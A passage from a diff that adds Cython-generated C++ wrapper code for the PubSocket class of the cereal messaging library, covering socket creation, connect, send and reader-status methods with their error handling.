cppPubSocket.create() + * if self.socket == NULL: + */ + +/* Python wrapper */ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 0, 0, __pyx_nargs); return -1;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_VARARGS(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__cinit__", 0))) return -1; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket___cinit__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket___cinit__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":220 + * + * def __cinit__(self): + * self.socket = cppPubSocket.create() # <<<<<<<<<<<<<< + * if self.socket == NULL: + * raise MessagingError + */ + __pyx_v_self->socket = PubSocket::create(); + + /* "cereal/messaging/messaging_pyx.pyx":221 + * def __cinit__(self): + * self.socket = cppPubSocket.create() + * if self.socket == NULL: # <<<<<<<<<<<<<< + * raise MessagingError + * + */ + __pyx_t_1 = (__pyx_v_self->socket == NULL); + if (unlikely(__pyx_t_1)) { + + /* "cereal/messaging/messaging_pyx.pyx":222 + * self.socket = cppPubSocket.create() + * if self.socket == NULL: + * raise MessagingError # <<<<<<<<<<<<<< + * + * def __dealloc__(self): + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_MessagingError); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 222, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 222, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":221 + * def __cinit__(self): + * self.socket = cppPubSocket.create() + * if self.socket == NULL: # <<<<<<<<<<<<<< + * raise MessagingError + * + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":219 + * cdef cppPubSocket * socket + * + * def __cinit__(self): # <<<<<<<<<<<<<< + * self.socket = cppPubSocket.create() + * if self.socket == NULL: + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.PubSocket.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":224 + * raise MessagingError + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.socket + * + */ + +/* Python wrapper */ +static void __pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_3__dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_3__dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_2__dealloc__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_2__dealloc__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "cereal/messaging/messaging_pyx.pyx":225 + * + * def __dealloc__(self): + * del self.socket # <<<<<<<<<<<<<< + * + * def connect(self, Context context, string endpoint): + */ + delete __pyx_v_self->socket; + + /* "cereal/messaging/messaging_pyx.pyx":224 + * raise MessagingError + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * del self.socket + * + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "cereal/messaging/messaging_pyx.pyx":227 + * del self.socket + * + * def connect(self, Context context, string endpoint): # <<<<<<<<<<<<<< + * r = self.socket.connect(context.context, endpoint) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_5connect(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9PubSocket_5connect = {"connect", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_5connect, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_5connect(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_context = 0; + std::string __pyx_v_endpoint; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("connect (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_context,&__pyx_n_s_endpoint,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_context)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_endpoint)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("connect", 1, 2, 2, 1); __PYX_ERR(0, 227, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "connect") < 0)) __PYX_ERR(0, 227, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_context = ((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *)values[0]); + __pyx_v_endpoint = __pyx_convert_string_from_py_std__in_string(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("connect", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 227, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.PubSocket.connect", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_context), __pyx_ptype_6cereal_9messaging_13messaging_pyx_Context, 1, "context", 0))) __PYX_ERR(0, 227, __pyx_L1_error) + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_4connect(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *)__pyx_v_self), __pyx_v_context, __PYX_STD_MOVE_IF_SUPPORTED(__pyx_v_endpoint)); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_4connect(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self, struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_context, std::string __pyx_v_endpoint) { + int __pyx_v_r; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("connect", 0); + + /* "cereal/messaging/messaging_pyx.pyx":228 + * + * def connect(self, Context context, string endpoint): + * r = self.socket.connect(context.context, endpoint) # <<<<<<<<<<<<<< + * + * if r != 0: + */ + __pyx_v_r = __pyx_v_self->socket->connect(__pyx_v_context->context, __pyx_v_endpoint); + + /* "cereal/messaging/messaging_pyx.pyx":230 + * r = self.socket.connect(context.context, endpoint) + * + * if r != 0: # <<<<<<<<<<<<<< + * if errno.errno == errno.EADDRINUSE: + * raise MultiplePublishersError(endpoint) + */ + __pyx_t_1 = (__pyx_v_r != 0); + if (__pyx_t_1) { + + /* "cereal/messaging/messaging_pyx.pyx":231 + * + * if r != 0: + * if errno.errno == errno.EADDRINUSE: # <<<<<<<<<<<<<< + * raise MultiplePublishersError(endpoint) + * else: + */ + __pyx_t_1 = (errno == EADDRINUSE); + if (unlikely(__pyx_t_1)) { + + /* "cereal/messaging/messaging_pyx.pyx":232 + * if r != 0: + * if errno.errno == errno.EADDRINUSE: + * raise MultiplePublishersError(endpoint) # <<<<<<<<<<<<<< + * else: + * raise MessagingError(endpoint) + */ + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_MultiplePublishersError); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_v_endpoint); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_4}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 232, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":231 + * + * if r != 0: + * if errno.errno == errno.EADDRINUSE: # <<<<<<<<<<<<<< + * raise MultiplePublishersError(endpoint) + * else: + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":234 + * raise MultiplePublishersError(endpoint) + * else: + * raise MessagingError(endpoint) # <<<<<<<<<<<<<< + * + * def send(self, bytes data): + */ + /*else*/ { + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_MessagingError); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 234, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_v_endpoint); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 234, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_4}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 234, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 234, __pyx_L1_error) + } + + /* "cereal/messaging/messaging_pyx.pyx":230 + * r = self.socket.connect(context.context, endpoint) + * + * if r != 0: # <<<<<<<<<<<<<< + * if errno.errno == errno.EADDRINUSE: + * raise MultiplePublishersError(endpoint) + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":227 + * del self.socket + * + * def connect(self, Context context, string endpoint): # <<<<<<<<<<<<<< + * r = self.socket.connect(context.context, endpoint) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.PubSocket.connect", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":236 + * raise MessagingError(endpoint) + * + * def send(self, bytes data): # <<<<<<<<<<<<<< + * length = len(data) + * r = self.socket.send(data, length) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_7send(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9PubSocket_7send = {"send", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_7send, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_7send(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_data = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("send (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_data,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_data)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 236, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "send") < 0)) __PYX_ERR(0, 236, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_data = ((PyObject*)values[0]); + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("send", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 236, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.PubSocket.send", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_data), (&PyBytes_Type), 1, "data", 1))) __PYX_ERR(0, 236, __pyx_L1_error) + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_6send(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *)__pyx_v_self), __pyx_v_data); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_6send(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self, PyObject *__pyx_v_data) { + Py_ssize_t __pyx_v_length; + int __pyx_v_r; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + char *__pyx_t_2; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("send", 0); + + /* "cereal/messaging/messaging_pyx.pyx":237 + * + * def send(self, bytes data): + * length = len(data) # <<<<<<<<<<<<<< + * r = self.socket.send(data, length) + * + */ + if (unlikely(__pyx_v_data == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(0, 237, __pyx_L1_error) + } + __pyx_t_1 = PyBytes_GET_SIZE(__pyx_v_data); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 237, __pyx_L1_error) + __pyx_v_length = __pyx_t_1; + + /* "cereal/messaging/messaging_pyx.pyx":238 + * def send(self, bytes data): + * length = len(data) + * r = self.socket.send(data, length) # <<<<<<<<<<<<<< + * + * if r != length: + */ + if (unlikely(__pyx_v_data == Py_None)) { + PyErr_SetString(PyExc_TypeError, "expected bytes, NoneType found"); + __PYX_ERR(0, 238, __pyx_L1_error) + } + __pyx_t_2 = __Pyx_PyBytes_AsWritableString(__pyx_v_data); if (unlikely((!__pyx_t_2) && PyErr_Occurred())) __PYX_ERR(0, 238, __pyx_L1_error) + __pyx_v_r = __pyx_v_self->socket->send(((char *)__pyx_t_2), __pyx_v_length); + + /* "cereal/messaging/messaging_pyx.pyx":240 + * r = self.socket.send(data, length) + * + * if r != length: # <<<<<<<<<<<<<< + * if errno.errno == errno.EADDRINUSE: + * raise MultiplePublishersError + */ + __pyx_t_3 = (__pyx_v_r != __pyx_v_length); + if (__pyx_t_3) { + + /* "cereal/messaging/messaging_pyx.pyx":241 + * + * if r != length: + * if errno.errno == errno.EADDRINUSE: # <<<<<<<<<<<<<< + * raise MultiplePublishersError + * else: + */ + __pyx_t_3 = (errno == EADDRINUSE); + if (unlikely(__pyx_t_3)) { + + /* "cereal/messaging/messaging_pyx.pyx":242 + * if r != length: + * if errno.errno == errno.EADDRINUSE: + * raise MultiplePublishersError # <<<<<<<<<<<<<< + * else: + * raise MessagingError + */ + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_MultiplePublishersError); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 242, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 242, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":241 + * + * if r != length: + * if errno.errno == errno.EADDRINUSE: # <<<<<<<<<<<<<< + * raise MultiplePublishersError + * else: + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":244 + * raise MultiplePublishersError + * else: + * raise MessagingError # <<<<<<<<<<<<<< + * + * def all_readers_updated(self): + */ + /*else*/ { + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_MessagingError); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 244, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 244, __pyx_L1_error) + } + + /* "cereal/messaging/messaging_pyx.pyx":240 + * r = self.socket.send(data, length) + * + * if r != length: # <<<<<<<<<<<<<< + * if errno.errno == errno.EADDRINUSE: + * raise MultiplePublishersError + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":236 + * raise MessagingError(endpoint) + * + * def send(self, bytes data): # <<<<<<<<<<<<<< + * length = len(data) + * r = self.socket.send(data, length) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.PubSocket.send", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":246 + * raise MessagingError + * + * def all_readers_updated(self): # <<<<<<<<<<<<<< + * return self.socket.all_readers_updated() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_9all_readers_updated(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9PubSocket_9all_readers_updated = {"all_readers_updated", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_9all_readers_updated, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_9all_readers_updated(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("all_readers_updated (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("all_readers_updated", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "all_readers_updated", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_8all_readers_updated(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_8all_readers_updated(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("all_readers_updated", 0); + + /* "cereal/messaging/messaging_pyx.pyx":247 + * + * def all_readers_updated(self): + * return self.socket.all_readers_updated() # <<<<<<<<<<<<<< + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyBool_FromLong(__pyx_v_self->socket->all_readers_updated()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 247, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":246 + * raise MessagingError + * + * def all_readers_updated(self): # <<<<<<<<<<<<<< + * return self.socket.all_readers_updated() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.PubSocket.all_readers_updated", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_11__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9PubSocket_11__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_11__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject 